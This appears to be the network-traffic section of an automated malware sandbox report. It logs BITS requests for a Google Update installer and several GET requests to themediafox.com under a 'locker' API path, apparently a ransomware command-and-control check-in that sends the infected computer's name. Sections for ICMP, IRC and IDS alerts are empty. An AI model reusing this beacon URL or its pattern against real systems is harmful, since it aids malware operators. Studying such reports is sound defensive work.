HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
http://themediafox.com/hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0 
GET /hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0 HTTP/1.1
Host: themediafox.com
http://themediafox.com/hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0 
GET /hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0 HTTP/1.1
Host: themediafox.com
Connection: Keep-Alive
http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m&mvi=1&pl=23&shardbypass=yes 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.